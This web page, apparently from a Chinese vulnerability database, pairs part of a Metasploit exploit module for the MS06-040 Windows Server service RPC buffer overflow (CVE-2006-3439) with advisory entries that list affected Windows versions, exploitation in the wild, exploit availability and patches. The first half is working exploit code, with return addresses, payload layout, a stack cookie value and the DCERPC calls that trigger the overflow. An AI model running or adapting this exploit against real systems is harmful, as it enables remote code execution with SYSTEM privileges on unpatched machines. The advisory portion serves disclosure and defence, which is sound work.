					[ 'CVE', '2006-3439' ],
					[ 'OSVDB', '27845' ],
					[ 'BID', '19409' ],
					[ 'MSB', 'MS06-040' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
	  				# Technically we can use more space than this, but by limiting it
					# to 370 bytes we can use the same request for all Windows SPs.				
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        => 
				[
	  				[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
					[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 
						{
							'Offset' => 1000,
							'Ret'    => 0x00020804 
						} 
					],
					[ '(wcscpy) Windows XP SP0/SP1',
						{
							'Offset' => 612, 
							'Ret'    => 0x00020804 
						}
					],
					[ '(stack)  Windows XP SP1 English',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71ab1d54 # jmp esp @ ws2_32.dll
						}
					],
					[ '(stack)  Windows XP SP1 Italian',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71a37bfb # jmp esp @ ws2_32.dll
						}
					],
					[ '(wcscpy) Windows 2003 SP0',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
				],

			'DisclosureDate' => 'Aug 8 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
			], self.class)
						
	end

	def exploit	
	
		connect()
		smb_login()

		if (target.name =~ /Automatic/)
			case smb_peer_os()
				when 'Windows 5.0'
					print_status("Detected a Windows 2000 target")
					target = targets[1]
					
				when 'Windows NT 4.0'
					print_status("Detected a Windows NT 4.0 target")
					target = targets[1]
				
				when 'Windows 5.1'
					begin
						smb_create("\\SRVSVC")
						print_status("Detected a Windows XP SP0/SP1 target")
					rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
						if (e.error_code == 0xc0000022)
							print_status("Windows XP SP2 is not exploitable")
							return
						end
						print_status("Detected a Windows XP target (unknown patch level)")
					end
					target = targets[2]
					
				when /Windows Server 2003 (\d+)$/
					print_status("Detected a Windows 2003 SP0 target")
					target = targets[5]
				
				when /Windows Server 2003 (\d+) Service Pack (\d+)/
					print_status("Windows 2003 SP#{$2} is not exploitable")
					return
				
				when /Samba/
					print_status("Samba is not vulnerable")
					return
					
				else
					print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
					return
			end
		end
		
		# Specific fixups for Windows NT
		case smb_peer_os()
		when 'Windows NT 4.0'
			print_status("Adjusting the SMB/DCERPC parameters for Windows NT")
			datastore['SMB::pipe_write_min_size'] = 2048
			datastore['SMB::pipe_write_max_size'] = 4096
		end
							
		handle = dcerpc_handle(
			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		#
		#  /* Function 0x1f at 0x767e912c */
		#  long function_1f (
		#    [in] [unique] [string] wchar_t * arg_00,
		#    [in] [string] wchar_t * arg_01,
		#    [out] [size_is(arg_03)] char * arg_02,
		#    [in] [range(0, 64000)] long arg_03,
		#    [in] [string] wchar_t * arg_04,
		#    [in,out] long * arg_05,
		#    [in] long arg_06
		#  );
		#

		print_status("Building the stub data...")	
		stub = ''

		case target.name

		# This covers NT 4.0 as well
		when /wcscpy.*Windows 2000/
		
			code = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded
			
			path = code + ( [target.ret].pack('V') * 16 ) + "\x00\x00"

			stub = 
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(250)+1) +
				NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
				NDR.long(rand(250)+1) +
				NDR.long(0)			
			
		when /wcscpy.*Windows XP/	
			path =
				# Payload goes first
				payload.encoded +
				
				# Padding
				rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
				
				# Land 6 bytes in to bypass garbage (XP SP0)
				[ target.ret + 6 ].pack('V') +
				
				# Padding
				rand_text_alphanumeric(8) +
				
				# Address to write our shellcode (XP SP0)
				[ target.ret ].pack('V') +
				
				# Padding
				rand_text_alphanumeric(32) +

				# Jump straight to shellcode (XP SP1)
				[ target.ret ].pack('V') +
				
				# Padding
				rand_text_alphanumeric(8) +				
				
				# Address to write our shellcode (XP SP1)
				[ target.ret ].pack('V') +
				
				# Padding
				rand_text_alphanumeric(32) +
				
				# Terminate the path
				"\x00\x00"
				
			stub = 
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)	
		
		
		when /stack/
			buff = rand_text_alphanumeric(800)
			buff[0, payload.encoded.length] = payload.encoded
			buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
			buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
			
			path = "\\\x00\\\x00" + buff + "\x00\x00"
			
			stub = 
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)
				
				
		when /wcscpy.*Windows 2003/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +

				# Padding
				rand_text_alphanumeric(32) +

				# The cookie is constant,
				# noticed by Nicolas Pouvesle in Misc #28
				"\x4e\xe6\x40\xbb" +

				# Padding
				rand_text_alphanumeric(4) +

				# Jump straight to shellcode
				[ target.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode
				[ target.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(40) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)

		end
		
		print_status("Calling the vulnerable function...")
		
		begin
			dcerpc.call(0x1f, stub)
			dcerpc.call(0x1f, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
    

- 漏洞信息

27845
Microsoft Windows Server Service Crafted RPC Message Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A buffer overflow exists in Windows. The Server service fails to validate RPC messages resulting in a buffer overflow. With a specially crafted RPC message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-08-08 Unknow
2006-08-19 2006-08-08

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Server Service Remote Buffer Overflow Vulnerability
Boundary Condition Error 19409
Yes No
2006-08-08 12:00:00 2007-06-27 02:58:00
US-CERT and SANS are credited with providing information about this issue. The individual responsible for discovering this issue is currently unknown.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

Microsoft Windows Server Service is prone to a remote buffer-overflow vulnerability.

This vulnerability arises when the service processes a malicious message in RPC communications.

A successful attack may result in arbitrary code execution with SYSTEM privileges leading to a full compromise. Attack attempts may result in denial-of-service conditions as well.

Microsoft has reported that this issue is being exploited in the wild.

Update (August 14, 2006): A worm named 'W32.Wargbot' that exploits this issue to spread is currently in the wild.

- 漏洞利用

Proof-of-concept exploits are available to members of the Immunity Partners program:

https://www.immunityinc.com/downloads/immpartners/ms06_040.tgz
https://www.immunityinc.com/downloads/immpartners/ms06_040.tar.gz

Another exploit for Immunity Partners is available:

https://www.immunityinc.com/downloads/immpartners/ms06_040-1.tar

This exploit reportedly works reliably against Windows 2003 with no service packs.

A Metasploit exploit module is available. It reportedly works against Windows NT 4.0, Windows 2000, Windows 2000 SP1 - SP4, Windows XP, and Windows XP SP1. It may result in a denial-of-service condition for Windows XP SP2 and Windows 2003 SP1.

A version of the Metasploit module has been ported to C and is available.

An additional exploit by ub3r st4r is available.

- 解决方案

Microsoft has released an advisory including fixes to address this issue.

A Cisco advisory containing various mitigation strategies using Cisco products to prevent attacks is available. Please see the references for more information.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站